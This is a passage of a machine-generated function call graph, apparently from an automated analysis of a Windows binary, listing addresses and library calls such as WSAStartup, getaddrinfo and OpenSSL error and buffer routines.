123448->123450 123449->123448 123450->123419 123450->123420 123450->123425 123452->123421 123453->123418 123537 7ffda55af750 123454->123537 123456 7ffda55ac870 123457 7ffda55ac8aa 123456->123457 123543 7ffda55c11c0 125 API calls 123456->123543 123461 7ffda55c2780 123457->123461 123459 7ffda55ac897 123544 7ffda55c11c0 125 API calls 123459->123544 123462 7ffda55c27cf 123461->123462 123483 7ffda55c27f1 123462->123483 123546 7ffda55c4530 123462->123546 123463 7ffda55d5780 6 API calls 123465 7ffda55c156e 123463->123465 123465->123435 123465->123436 123465->123441 123467 7ffda55c284c 123469 7ffda55c2858 _strdup 123467->123469 123470 7ffda55c286a 123467->123470 123468 7ffda55c283a _strdup 123468->123467 123468->123483 123469->123470 123469->123483 123471 7ffda55c2876 _strdup 123470->123471 123472 7ffda55c2888 123470->123472 123471->123472 123471->123483 123602 7ffda55c3180 123472->123602 123483->123463 123526 7ffda557b41d 123525->123526 123527 7ffda557b405 123525->123527 123528 7ffda557b45e 123526->123528 123529 7ffda557b42c calloc 123526->123529 123527->123526 123745 7ffda5575cd0 123527->123745 123528->123441 123531 7ffda557b450 123529->123531 123532 7ffda557b477 123529->123532 123536->123435 123538 7ffda55af766 123537->123538 123539 7ffda55af76b 123537->123539 123545 7ffda55b00a0 free 123538->123545 123540 7ffda55af7ac 123539->123540 123542 7ffda55af797 free 123539->123542 123540->123456 123542->123539 123542->123540 123543->123459 123544->123457 123545->123539 123547 7ffda55c454b 123546->123547 123548 7ffda55c456a 123546->123548 123547->123548 123549 7ffda55c4554 123547->123549 123707 7ffda55c5090 9 API calls 123548->123707 123705 7ffda55c5090 9 API calls 123549->123705 123552 7ffda55c455c 123706 7ffda55c55a0 12 API calls 123552->123706 123554 7ffda55c4568 123557 7ffda55c4572 123554->123557 123555 7ffda55c46dd 123711 7ffda55c5700 6 API calls 123555->123711 123559 7ffda55c45fd 123557->123559 123568 7ffda55c2824 123557->123568 123708 7ffda55a1800 _strdup 123557->123708 
123558 7ffda55c470a 123558->123568 123712 7ffda55c5700 6 API calls 123558->123712 123559->123555 123561 7ffda55c46a2 123559->123561 123562 7ffda55c4652 123559->123562 123710 7ffda55c5700 6 API calls 123561->123710 123709 7ffda55830a0 6 API calls 123562->123709 123563 7ffda55c45db 123563->123559 123567 7ffda55c45f0 free 123563->123567 123563->123568 123566 7ffda55c46b4 123566->123555 123566->123568 123570 7ffda55c46d0 free 123566->123570 123567->123559 123568->123467 123568->123468 123568->123483 123570->123555 123571 7ffda55c48b5 123572 7ffda55c478d _strdup 123572->123568 123583 7ffda55c4725 123572->123583 123578 7ffda55c4805 free 123578->123583 123579 7ffda55c4838 free 123579->123583 123580 7ffda55c48f6 123581 7ffda55c5700 6 API calls 123581->123583 123583->123568 123583->123571 123583->123572 123583->123578 123583->123579 123583->123580 123583->123581 123585 7ffda55c487f free 123583->123585 123586 7ffda55c48d4 123583->123586 123713 7ffda55c5160 9 API calls 123583->123713 123714 7ffda5592640 10 API calls 123583->123714 123585->123583 123614 7ffda55c31c5 123602->123614 123603 7ffda55c32a5 123604 7ffda55c327e _strdup 123604->123603 123610 7ffda55c3633 free free 123614->123603 123614->123604 123614->123610 123705->123552 123706->123554 123707->123557 123708->123563 123709->123568 123710->123566 123711->123558 123712->123583 123713->123572 123714->123583 123750 7ffda5575d09 123745->123750 123753 7ffda5575dc6 123745->123753 123750->123753 123753->123526 123754 7ffda557a9d0 123755 7ffda557aa0b 123754->123755 123760 7ffda557aa00 123754->123760 123757 7ffda557aa15 123755->123757 123773 7ffda557c480 8 API calls 123755->123773 123757->123760 123762 7ffda557bcc0 123757->123762 123759 7ffda557aa54 123759->123760 123761 7ffda55ab550 2 API calls 123759->123761 123761->123760 123770 7ffda557bd20 123762->123770 123763 7ffda55bf210 2 API calls 123763->123770 123764 7ffda557be59 WSASetLastError 123764->123770 123765 7ffda557c415 123776 7ffda55830a0 6 API calls 123765->123776 123768 
7ffda557c2fb 123768->123759 123769 7ffda557c2f2 123769->123768 123775 7ffda55830a0 6 API calls 123769->123775 123770->123763 123770->123764 123770->123765 123770->123768 123770->123769 123772 7ffda557b800 QueryPerformanceCounter GetTickCount 123770->123772 123774 7ffda5583190 6 API calls 123770->123774 123772->123770 123773->123757 123774->123770 123775->123768 123776->123768 123777 7ffda5578f90 123778 7ffda5578fcd 123777->123778 123779 7ffda5578fc3 123777->123779 123778->123779 123783 7ffda5575720 123778->123783 123780 7ffda5578fe5 123780->123779 123781 7ffda55bf210 2 API calls 123780->123781 123781->123779 123784 7ffda5575751 123783->123784 123785 7ffda5575740 123783->123785 123786 7ffda55bf210 2 API calls 123784->123786 123785->123780 123787 7ffda5575763 123786->123787 123789 7ffda557576c 123787->123789 123790 7ffda55757bc 123787->123790 123791 7ffda55757fa 123787->123791 123788 7ffda5575775 123788->123780 123789->123788 123797 7ffda5576120 QueryPerformanceCounter GetTickCount 123789->123797 123795 7ffda5576120 QueryPerformanceCounter GetTickCount 123790->123795 123791->123789 123796 7ffda5576120 QueryPerformanceCounter GetTickCount 123791->123796 123795->123789 123796->123789 123797->123788 123798 7ffda5586c50 AcquireSRWLockExclusive 123799 7ffda5586e20 26 API calls 123798->123799 123800 7ffda5586c6e ReleaseSRWLockExclusive 123799->123800 123801 7ffda55cef50 123802 7ffda55cef86 123801->123802 123817 7ffda55cef7b 123801->123817 123803 7ffda55ceff6 123802->123803 123804 7ffda55cf074 123802->123804 123802->123817 123807 7ffda55ceffe 123803->123807 123808 7ffda55cf01f 123803->123808 123805 7ffda55cf078 123804->123805 123806 7ffda55cf08e 123804->123806 123836 7ffda55830a0 6 API calls 123805->123836 123810 7ffda55cf0b9 123806->123810 123812 7ffda55cf0a3 123806->123812 123834 7ffda55830a0 6 API calls 123807->123834 123815 7ffda55cf00d 123808->123815 123835 7ffda55830a0 6 API calls 123808->123835 123819 7ffda55cc9c0 123810->123819 123837 7ffda55830a0 6 API calls 
ERR_set_debug 125209 7ffda3334867 ERR_set_error 125208->125209 125211 7ffda3334873 125209->125211 125212 7ffda33343e1 ERR_new 125210->125212 125213 7ffda3334408 125210->125213 125214 7ffda3333a70 89 API calls 125211->125214 125215 7ffda33343eb ERR_set_debug 125212->125215 125216 7ffda3334410 CRYPTO_strdup 125213->125216 125217 7ffda3334435 OPENSSL_LH_new OPENSSL_LH_set_thunks 125213->125217 125214->125279 125215->125209 125216->125211 125216->125217 125219 7ffda33344bb ERR_new 125217->125219 125220 7ffda33344ca X509_STORE_new 125217->125220 125219->125215 125221 7ffda33344ff 125220->125221 125222 7ffda33344d8 ERR_new ERR_set_debug 125220->125222 125223 7ffda333453d 125221->125223 125224 7ffda3334516 ERR_new ERR_set_debug 125221->125224 125222->125209 125296 7ffda3330eb0 125223->125296 125224->125209 125226 7ffda3334545 125281 7ffda3332f60 125280->125281 125282 7ffda3332f6c 125281->125282 125283 7ffda3332fba 125281->125283 125284 7ffda3332fad 125282->125284 125285 7ffda3332f75 ERR_new ERR_set_debug ERR_set_error 125282->125285 125283->125284 125286 7ffda3332fd9 CRYPTO_THREAD_run_once 125283->125286 125284->125204 125285->125284 125286->125284 125287 7ffda3332ffd 125286->125287 125288 7ffda3333004 CRYPTO_THREAD_run_once 125287->125288 125289 7ffda3333026 125287->125289 125288->125284 125288->125289 125290 7ffda333302d CRYPTO_THREAD_run_once 125289->125290 125291 7ffda333305e 125289->125291 125290->125204 125291->125204 125293 7ffda33aedf0 125292->125293 125294 7ffda332bffa CRYPTO_THREAD_run_once 125293->125294 125295 7ffda332c024 125294->125295 125295->125207 125295->125208 125298 7ffda3330ec9 125296->125298 125300 7ffda3330f24 125298->125300 125427 7ffda333ee40 125298->125427 125299 7ffda333ef20 5 API calls 125299->125300 125300->125299 125301 7ffda3330f65 EVP_MD_get_size 125300->125301 125303 7ffda3330f8b ERR_set_mark EVP_SIGNATURE_fetch 125300->125303 125301->125300 125302 7ffda33313ae 125301->125302 125302->125226 125304 7ffda3330fb2 125303->125304 125305 
7ffda3330fc3 EVP_KEYEXCH_fetch 125304->125305 125428 7ffda333ee55 125427->125428 125433 7ffda3353f40 125428->125433 125434 7ffda3353f50 125433->125434 125455 7ffda3336950 125457 7ffda3336965 125455->125457 125456 7ffda3336973 125458 7ffda333699c ERR_new ERR_set_debug ERR_set_error 125456->125458 125466 7ffda33369de 125456->125466 125457->125456 125459 7ffda3336a7a 125457->125459 125460 7ffda3364ecf 125459->125460 125461 7ffda3364f36 125459->125461 125463 7ffda3364f16 125459->125463 125594 7ffda3368fd0 ERR_new ERR_set_debug ERR_vset_error 125460->125594 125595 7ffda3322840 EnterCriticalSection 125461->125595 125467 7ffda3364f1a 125463->125467 125596 7ffda3322840 EnterCriticalSection 125463->125596 125469 7ffda3336a60 125466->125469 125470 7ffda3336a1b ASYNC_get_current_job 125466->125470 125473 7ffda3336a66 125466->125473 125482 7ffda3397b90 125469->125482 125519 7ffda3397970 125469->125519 125556 7ffda33982b3 125469->125556 125470->125469 125471 7ffda3336a25 125470->125471 125593 7ffda333fbe0 9 API calls 125471->125593 125475 7ffda3336a50 125483 7ffda3397b9a 125482->125483 125484 7ffda33982fd ERR_clear_error SetLastError 125483->125484 125508 7ffda3397bc1 125483->125508 125485 7ffda3398316 125484->125485 125487 7ffda339838d 125485->125487 125622 7ffda3335e50 ERR_new ERR_set_debug ERR_set_error 125485->125622 125488 7ffda339845f 125487->125488 125489 7ffda3398412 125487->125489 125487->125508 125518 7ffda33983a4 125487->125518 125493 7ffda3398477 125488->125493 125494 7ffda339846b ERR_new 125488->125494 125489->125493 125497 7ffda339842a ERR_new 125489->125497 125490 7ffda339866e 125505 7ffda339845a 125490->125505 125597 7ffda3398720 125490->125597 125628 7ffda3397ed0 82 API calls 125490->125628 125491 7ffda33985fb 125496 7ffda3398609 ERR_new ERR_set_debug 125491->125496 125499 7ffda339863b ERR_new ERR_set_debug ERR_set_error 125491->125499 125502 7ffda339849b 125493->125502 125503 7ffda339848f ERR_new 125493->125503 125495 7ffda3398434 ERR_set_debug 125494->125495 
125623 7ffda3397c10 11 API calls 125495->125623 125627 7ffda3397c10 11 API calls 125496->125627 125497->125495 125499->125505 125506 7ffda33984e1 125502->125506 125507 7ffda33984a4 BUF_MEM_new 125502->125507 125503->125495 125504 7ffda3398535 BUF_MEM_free 125504->125508 125505->125504 125624 7ffda333f340 8 API calls 125506->125624 125509 7ffda33984c0 BUF_MEM_grow 125507->125509 125510 7ffda33984b1 ERR_new 125507->125510 125508->125473 125509->125506 125512 7ffda33984d2 ERR_new 125509->125512 125510->125495 125512->125495 125513 7ffda33984fe 125514 7ffda3398502 ERR_new ERR_set_debug 125513->125514 125516 7ffda339857a 125513->125516 125514->125505 125625 7ffda3397c10 11 API calls 125514->125625 125516->125518 125626 7ffda33a6610 29 API calls 125516->125626 125518->125490 125518->125491 125518->125504 125520 7ffda339797a 125519->125520 125520->125473 125521 7ffda33982fd ERR_clear_error SetLastError 125520->125521 125522 7ffda3398548 125520->125522 125523 7ffda3398316 125521->125523 125522->125473 125525 7ffda339838d 125523->125525 125752 7ffda3335e50 ERR_new ERR_set_debug ERR_set_error 125523->125752 125525->125522 125526 7ffda339845f 125525->125526 125527 7ffda3398412 125525->125527 125555 7ffda33983a4 125525->125555 125530 7ffda3398477 125526->125530 125531 7ffda339846b ERR_new 125526->125531 125527->125530 125534 7ffda339842a ERR_new 125527->125534 125528 7ffda33985fb 125533 7ffda3398609 ERR_new ERR_set_debug 125528->125533 125536 7ffda339863b ERR_new ERR_set_debug ERR_set_error 125528->125536 125541 7ffda339849b 125530->125541 125542 7ffda339848f ERR_new 125530->125542 125532 7ffda3398434 ERR_set_debug 125531->125532 125753 7ffda3397c10 11 API calls 125532->125753 125757 7ffda3397c10 11 API calls 125533->125757 125534->125532 125535 7ffda3398720 117 API calls 125538 7ffda339866e 125535->125538 125539 7ffda339845a 125536->125539 125538->125535 125538->125539 125758 7ffda3397ed0 82 API calls 125538->125758 125543 7ffda3398535 BUF_MEM_free 125539->125543 125544 
7ffda33984a4 BUF_MEM_new 125541->125544 125549 7ffda33984e1 125541->125549 125542->125532 125543->125522 125545 7ffda33984c0 BUF_MEM_grow 125544->125545 125546 7ffda33984b1 ERR_new 125544->125546 125548 7ffda33984d2 ERR_new 125545->125548 125545->125549 125546->125532 125548->125532 125754 7ffda333f340 8 API calls 125549->125754 125550 7ffda33984fe 125551 7ffda3398502 ERR_new ERR_set_debug 125550->125551 125553 7ffda339857a 125550->125553 125551->125539 125755 7ffda3397c10 11 API calls 125551->125755 125553->125555 125756 7ffda33a6610 29 API calls 125553->125756 125555->125528 125555->125538 125555->125543 125557 7ffda33982c0 125556->125557 125558 7ffda33982fd ERR_clear_error SetLastError 125557->125558 125559 7ffda3398548 125557->125559 125560 7ffda3398316 125558->125560 125559->125473 125563 7ffda339838d 125560->125563 125759 7ffda3335e50 ERR_new ERR_set_debug ERR_set_error 125560->125759 125562 7ffda33983a4 125566 7ffda33985fb 125562->125566 125576 7ffda339866e 125562->125576 125581 7ffda3398535 BUF_MEM_free 125562->125581 125563->125559 125563->125562 125564 7ffda339845f 125563->125564 125565 7ffda3398412 125563->125565 125568 7ffda3398477 125564->125568 125569 7ffda339846b ERR_new 125564->125569 125565->125568 125572 7ffda339842a ERR_new 125565->125572 125571 7ffda3398609 ERR_new ERR_set_debug 125566->125571 125574 7ffda339863b ERR_new ERR_set_debug ERR_set_error 125566->125574 125579 7ffda339849b 125568->125579 125580 7ffda339848f ERR_new 125568->125580 125570 7ffda3398434 ERR_set_debug 125569->125570 125760 7ffda3397c10 11 API calls 125570->125760 125764 7ffda3397c10 11 API calls 125571->125764 125572->125570 125573 7ffda3398720 117 API calls 125573->125576 125577 7ffda339845a 125574->125577 125576->125573 125576->125577 125765 7ffda3397ed0 82 API calls 125576->125765 125577->125581 125582 7ffda33984e1 125579->125582 125583 7ffda33984a4 BUF_MEM_new 125579->125583 125580->125570 125581->125559 125761 7ffda333f340 8 API calls 125582->125761 125584 7ffda33984c0 
BUF_MEM_grow 125583->125584 125585 7ffda33984b1 ERR_new 125583->125585 125584->125582 125587 7ffda33984d2 ERR_new 125584->125587 125585->125570 125587->125570 125588 7ffda33984fe 125589 7ffda3398502 ERR_new ERR_set_debug 125588->125589 125591 7ffda339857a 125588->125591 125589->125577 125762 7ffda3397c10 11 API calls 125589->125762 125591->125562 125763 7ffda33a6610 29 API calls 125591->125763 125593->125475 125594->125463 125611 7ffda339873c 125597->125611 125598 7ffda33987d5 ERR_new ERR_set_debug 125599 7ffda3398b27 125598->125599 125645 7ffda3397c10 11 API calls 125599->125645 125600 7ffda3398af2 125601 7ffda3398b04 ERR_new 125600->125601 125606 7ffda3398a26 125600->125606 125607 7ffda3398b0e ERR_set_debug 125601->125607 125605 7ffda33a2d10 81 API calls 125605->125611 125606->125490 125607->125599 125608 7ffda3398ad9 125644 7ffda33213a0 CRYPTO_free 125608->125644 125610 7ffda3398ae3 ERR_new 125610->125600 125611->125598 125611->125600 125611->125605 125611->125606 125611->125608 125612 7ffda3398ac0 125611->125612 125613 7ffda3398a6b 125611->125613 125629 7ffda33271f0 125611->125629 125638 7ffda33213a0 CRYPTO_free 125611->125638 125639 7ffda33215d0 CRYPTO_free BUF_MEM_grow CRYPTO_free 125611->125639 125640 7ffda3325530 11 API calls 125611->125640 125641 7ffda33a05c0 46 API calls 125611->125641 125643 7ffda33213a0 CRYPTO_free 125612->125643 125642 7ffda33213a0 CRYPTO_free 125613->125642 125618 7ffda3398aca ERR_new 125618->125608 125619 7ffda3398a75 125619->125606 125620 7ffda3398a8b ERR_new 125619->125620 125620->125607 125622->125487 125623->125505 125624->125513 125625->125505 125626->125518 125627->125499 125628->125490 125632 7ffda33271fa 125629->125632 125630 7ffda33a2e03 125646 7ffda3381310 125630->125646 125632->125630 125635 7ffda33a2e9a 125632->125635 125636 7ffda33a2da5 BUF_MEM_grow 125632->125636 125635->125611 125636->125635 125637 7ffda33a2dba memcpy 125636->125637 125637->125630 125638->125611 125639->125611 125640->125611 125641->125611 
125642->125619 125643->125618 125644->125610 125645->125606 125649 7ffda338132a 125646->125649 125647 7ffda33aee50 8 API calls 125651 7ffda33818aa 125647->125651 125648 7ffda3381863 ERR_new ERR_set_debug 125652 7ffda3381886 125648->125652 125649->125648 125650 7ffda33813a6 125649->125650 125668 7ffda3381502 125649->125668 125660 7ffda3381400 125650->125660 125695 7ffda3380260 13 API calls 125650->125695 125651->125635 125676 7ffda33267e0 18 API calls 125651->125676 125699 7ffda3397c10 11 API calls 125652->125699 125655 7ffda33813b7 125656 7ffda33813e3 125655->125656 125657 7ffda33813bb ERR_new 125655->125657 125659 7ffda33813f4 ERR_new 125656->125659 125656->125660 125658 7ffda33813c5 ERR_set_debug 125657->125658 125658->125652 125659->125658 125661 7ffda338150f ERR_new ERR_set_debug 125660->125661 125662 7ffda338149d 125660->125662 125664 7ffda33814cd 125660->125664 125660->125668 125661->125652 125696 7ffda3380320 17 API calls 125662->125696 125665 7ffda3381857 ERR_new 125664->125665 125664->125668 125669 7ffda338158d 125664->125669 125666 7ffda338183c ERR_set_debug 125665->125666 125666->125652 125667 7ffda3381832 ERR_new 125667->125666 125668->125647 125669->125667 125669->125668 125670 7ffda33817e0 ERR_new ERR_set_debug 125669->125670 125672 7ffda3381787 125669->125672 125677 7ffda3386a60 125669->125677 125698 7ffda3397c10 11 API calls 125670->125698 125672->125668 125673 7ffda33817a3 ERR_new ERR_set_debug 125672->125673 125676->125635 125678 7ffda3386a6c 125677->125678 125695->125655 125696->125664 125698->125668 125699->125668 125752->125525 125753->125539 125754->125550 125755->125539 125756->125555 125757->125536 125758->125538 125759->125563 125760->125577 125761->125588 125762->125577 125763->125562 125764->125574 125765->125576 125766 7ffda37750d0 125767 7ffda37750ea 125766->125767 125768 7ffda37750d5 125766->125768 125772 7ffda37766f0 125768->125772 125773 7ffda377672a 125772->125773 125774 7ffda3776707 125772->125774 125775 7ffda37763c0 
Concurrency::details::SchedulerProxy::DeleteThis 10 API calls 125773->125775 125774->125773 125788 7ffda3782220 6 API calls Concurrency::details::SchedulerProxy::DeleteThis 125774->125788 125777 7ffda377673b 125775->125777 125791 7ffda377e5f0 5 API calls Concurrency::details::SchedulerProxy::DeleteThis 125777->125791 125778 7ffda377671a 125789 7ffda37822a0 83 API calls Concurrency::details::SchedulerProxy::DeleteThis 125778->125789 125781 7ffda377675c 125792 7ffda378bd80 malloc 125781->125792 125782 7ffda3776722 125790 7ffda3782880 fflush 125782->125790 125784 7ffda3776768 125786 7ffda377677a free 125784->125786 125787 7ffda3776787 125784->125787 125786->125787 125788->125778 125789->125782 125790->125773 125791->125781 125792->125784 125793 7ffda37880d0 125794 7ffda378c3b0 Concurrency::details::SchedulerProxy::DeleteThis 3 API calls 125793->125794 125796 7ffda37880e5 125794->125796 125795 7ffda37880e9 125796->125795 125799 7ffda378c420 LeaveCriticalSection 125796->125799 125798 7ffda3788127 125799->125798 125800 7ffda3774218 125801 7ffda3774231 125800->125801 125802 7ffda3774a9a 125801->125802 125803 7ffda377425d 125801->125803 125829 7ffda37748a3 125801->125829 125887 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 125802->125887 125868 7ffda37820a0 125803->125868 125804 7ffda3796230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 125807 7ffda3774dc9 125804->125807 125808 7ffda3774285 125810 7ffda37742e2 125808->125810 125811 7ffda3774a7f 125808->125811 125826 7ffda377428f 125808->125826 125813 7ffda3774434 125810->125813 125814 7ffda37742eb 125810->125814 125886 7ffda3781de0 7 API calls Concurrency::details::SchedulerProxy::DeleteThis 125811->125886 125812 7ffda37749d9 125883 7ffda3781fb0 5 API calls Concurrency::details::SchedulerProxy::DeleteThis 125812->125883 125819 7ffda377443d 125813->125819 125820 7ffda3774a56 125813->125820 125876 7ffda37852a0 58 API calls Concurrency::details::SchedulerProxy::DeleteThis 
125814->125876 125821 7ffda37820a0 32 API calls 125819->125821 125885 7ffda3785920 50 API calls Concurrency::details::SchedulerProxy::DeleteThis 125820->125885 125825 7ffda3774456 125821->125825 125822 7ffda37742f5 125822->125826 125841 7ffda37742fd 125822->125841 125824 7ffda37749f6 125824->125826 125827 7ffda3774a1f 125824->125827 125825->125826 125828 7ffda377445e 125825->125828 125826->125829 125889 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 125826->125889 125827->125829 125884 7ffda378c280 free realloc free Concurrency::details::SchedulerProxy::DeleteThis 125827->125884 125878 7ffda3772330 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 125828->125878 125829->125804 125832 7ffda3774475 125832->125829 125879 7ffda3782880 fflush 125832->125879 125834 7ffda3773b13 125836 7ffda3773b83 125834->125836 125837 7ffda37763c0 Concurrency::details::SchedulerProxy::DeleteThis 10 API calls 125834->125837 125835 7ffda377361d free 125855 7ffda377357a 125835->125855 125838 7ffda3773bb2 125836->125838 125839 7ffda3774d8e 125836->125839 125840 7ffda3773b61 125837->125840 125880 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 125838->125880 125888 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 125839->125888 125874 7ffda377ae50 free free free free 125840->125874 125841->125855 125877 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 125841->125877 125842 7ffda3773662 memset 125842->125855 125846 7ffda3773b69 125875 7ffda377e5f0 5 API calls Concurrency::details::SchedulerProxy::DeleteThis 125846->125875 125847 7ffda37736a3 _errno strtol 125847->125838 125851 7ffda37736ce _errno 125847->125851 125850 7ffda3791830 12 API calls Concurrency::details::SchedulerProxy::DeleteThis 125850->125855 125851->125838 125851->125855 125852 7ffda37736f0 isspace 125852->125855 125853 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 125853->125855 
125854 7ffda378e100 calloc calloc free getaddrinfo 125854->125855 125855->125829 125855->125834 125855->125835 125855->125838 125855->125842 125855->125847 125855->125850 125855->125852 125855->125853 125855->125854 125857 7ffda3773852 calloc 125855->125857 125858 7ffda377392f 125857->125858 125859 7ffda37748a8 125857->125859 125860 7ffda3773998 125858->125860 125862 7ffda3773940 memcpy 125858->125862 125881 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 125859->125881 125873 7ffda378e290 free free freeaddrinfo 125860->125873 125862->125860 125862->125862 125863 7ffda37748b7 125882 7ffda378e290 free free freeaddrinfo 125863->125882 125866 7ffda37748c4 125866->125829 125867 7ffda37739a5 125867->125834 125869 7ffda37820ad 125868->125869 125870 7ffda377426f 125868->125870 125869->125870 125871 7ffda37820b3 125869->125871 125870->125808 125870->125812 125870->125829 125890 7ffda377e7c0 32 API calls Concurrency::details::SchedulerProxy::DeleteThis 125871->125890 125873->125867 125874->125846 125875->125836 125876->125822 125877->125855 125878->125832 125879->125855 125880->125829 125881->125863 125882->125866 125883->125824 125884->125829 125885->125826 125886->125829 125887->125829 125888->125829 125889->125829 125890->125870 125891 7ffda3774e55 125892 7ffda3774e8b 125891->125892 125896 7ffda3773350 125891->125896 125894 7ffda3774ea4 125892->125894 125906 7ffda37767a0 125892->125906 125914 7ffda377a090 125896->125914 125899 7ffda377336a 125899->125892 125901 7ffda3773380 125905 7ffda3773398 125901->125905 125939 7ffda3776ae0 125901->125939 125905->125892 125907 7ffda3776805 125906->125907 125908 7ffda37767db 125906->125908 125907->125894 125908->125907 125911 7ffda3776801 125908->125911 126156 7ffda377a920 31 API calls Concurrency::details::SchedulerProxy::DeleteThis 125908->126156 125910 7ffda377685f _time64 125910->125911 125911->125907 125911->125910 125913 7ffda37734c0 27 API calls 125911->125913 126150 7ffda3782930 125911->126150 
125913->125911 125915 7ffda377a0b4 WSAStartup 125914->125915 125916 7ffda377a0cf WSASetLastError malloc 125914->125916 125917 7ffda377a0c8 125915->125917 125926 7ffda377a0ea 125915->125926 125918 7ffda377a0f1 memset malloc malloc malloc 125916->125918 125916->125926 125917->125916 126087 7ffda378bca0 malloc 125918->126087 125921 7ffda3796230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 125922 7ffda3773362 125921->125922 125922->125899 125927 7ffda3776a20 125922->125927 125923 7ffda378bca0 malloc 125924 7ffda377a1dd 125923->125924 125924->125926 126089 7ffda3779330 125924->126089 125926->125921 126109 7ffda377a810 199 API calls 125927->126109 125929 7ffda3776a42 125930 7ffda3776a4a 125929->125930 126110 7ffda3779240 29 API calls Concurrency::details::SchedulerProxy::DeleteThis 125929->126110 125930->125901 125932 7ffda3776a6a 125933 7ffda3776a6e 125932->125933 125934 7ffda3776aac 125932->125934 125935 7ffda3776a81 free 125933->125935 125936 7ffda3776a96 free 125933->125936 125937 7ffda3776aca free 125934->125937 125938 7ffda3776ab5 free 125934->125938 125935->125935 125935->125936 125936->125901 125937->125901 125938->125937 125938->125938 125940 7ffda3776b10 calloc 125939->125940 125942 7ffda37777e5 125940->125942 125949 7ffda3776bc6 125940->125949 126141 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 125942->126141 125944 7ffda3776f97 125953 7ffda3777009 free 125944->125953 125957 7ffda377701b 125944->125957 125945 7ffda3776d50 126111 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 125945->126111 125946 7ffda3796230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 125947 7ffda377338c 125946->125947 125947->125905 126077 7ffda37768e0 125947->126077 125948 7ffda3776c13 malloc 125955 7ffda3776c33 memcpy 125948->125955 125956 7ffda3776c46 125948->125956 125949->125948 125959 7ffda3776c7d 125949->125959 125950 7ffda3776e2a free 125962 7ffda3776da5 125950->125962 125951 7ffda3776f2f 
125961 7ffda3776f9e 125951->125961 125968 7ffda3776f3d 125951->125968 125969 7ffda3776f99 125951->125969 126113 7ffda3772860 30 API calls Concurrency::details::SchedulerProxy::DeleteThis 125953->126113 125954 7ffda3776d4b 125954->125945 125954->125962 125955->125956 125956->125942 125956->125949 125956->125959 125966 7ffda377703e free _strdup 125957->125966 125972 7ffda377705b 125957->125972 126038 7ffda3776da0 125957->126038 125959->125945 125959->125954 125960 7ffda3776cd2 malloc 125959->125960 125959->125962 125964 7ffda3776d0b 125960->125964 125965 7ffda3776cf8 memcpy 125960->125965 126112 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 125961->126112 125962->125950 125963 7ffda3776e54 _strdup 125962->125963 125970 7ffda3776dff isalpha 125962->125970 125973 7ffda3776e7d 125962->125973 125963->125942 125963->125962 125964->125942 125964->125959 125977 7ffda3776d44 125964->125977 125965->125964 125966->125942 125966->125972 125967 7ffda3776ec3 malloc 125974 7ffda3776ee3 memcpy 125967->125974 125975 7ffda3776ef6 125967->125975 125968->125944 125976 7ffda3776f60 _strdup 125968->125976 125969->125944 125969->125961 125970->125962 125978 7ffda377707f memset SHGetFolderPathA 125972->125978 125983 7ffda3777190 125972->125983 125991 7ffda3777119 125972->125991 125973->125944 125973->125951 125973->125967 125974->125975 125975->125942 125975->125951 125975->125973 125976->125942 125976->125968 125977->125945 125977->125954 125980 7ffda37770b1 125978->125980 125978->125991 125979 7ffda37773b6 125981 7ffda37774c9 _strdup 125979->125981 125995 7ffda37773d8 125979->125995 125982 7ffda3791830 Concurrency::details::SchedulerProxy::DeleteThis 12 API calls 125980->125982 125981->125942 125984 7ffda37773f5 125981->125984 125985 7ffda37770cf free malloc 125982->125985 125983->125979 125986 7ffda37771df malloc 125983->125986 125985->125942 125986->125942 125988 7ffda3777203 memcpy 125986->125988 126021 7ffda377722a 125988->126021 125991->125983 126114 
7ffda377a9f0 95 API calls Concurrency::details::SchedulerProxy::DeleteThis 125991->126114 125995->125984 125996 7ffda37774a7 125995->125996 126038->125946 126079 7ffda37768ee 126077->126079 126080 7ffda377691d 126077->126080 126078 7ffda37763c0 Concurrency::details::SchedulerProxy::DeleteThis 10 API calls 126078->126080 126081 7ffda377692f 126079->126081 126082 7ffda3776900 126079->126082 126085 7ffda3776913 126079->126085 126080->125905 126142 7ffda37734c0 126081->126142 126148 7ffda378c210 free realloc memcpy free Concurrency::details::SchedulerProxy::DeleteThis 126082->126148 126085->126078 126086 7ffda3776981 126085->126086 126086->125905 126088 7ffda377a1ce 126087->126088 126088->125923 126090 7ffda3779353 free 126089->126090 126097 7ffda377939e Concurrency::details::SchedulerProxy::DeleteThis 126089->126097 126090->126097 126091 7ffda377942e 14 API calls 126092 7ffda37794ed 9 API calls 126091->126092 126099 7ffda37794d2 Concurrency::details::SchedulerProxy::DeleteThis 126091->126099 126094 7ffda3779583 21 API calls 126092->126094 126095 7ffda3779565 Concurrency::details::SchedulerProxy::DeleteThis 126092->126095 126093 7ffda37793b4 free free free 126093->126097 126106 7ffda378bd40 126094->126106 126095->126095 126101 7ffda3779576 free 126095->126101 126097->126091 126097->126093 126097->126097 126105 7ffda377940e free 126097->126105 126103 7ffda37794e3 free 126099->126103 126101->126094 126102 7ffda378bd40 Concurrency::details::SchedulerProxy::DeleteThis free 126104 7ffda37796ac free 126102->126104 126103->126092 126105->126097 126107 7ffda378bd58 free 126106->126107 126108 7ffda37796a0 126106->126108 126107->126108 126108->126102 126109->125929 126110->125932 126111->126038 126112->126038 126113->125957 126114->125991 126141->126038 126143 7ffda3773525 126142->126143 126146 7ffda3774dae 126142->126146 126143->126146 126149 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126143->126149 126144 7ffda3796230 
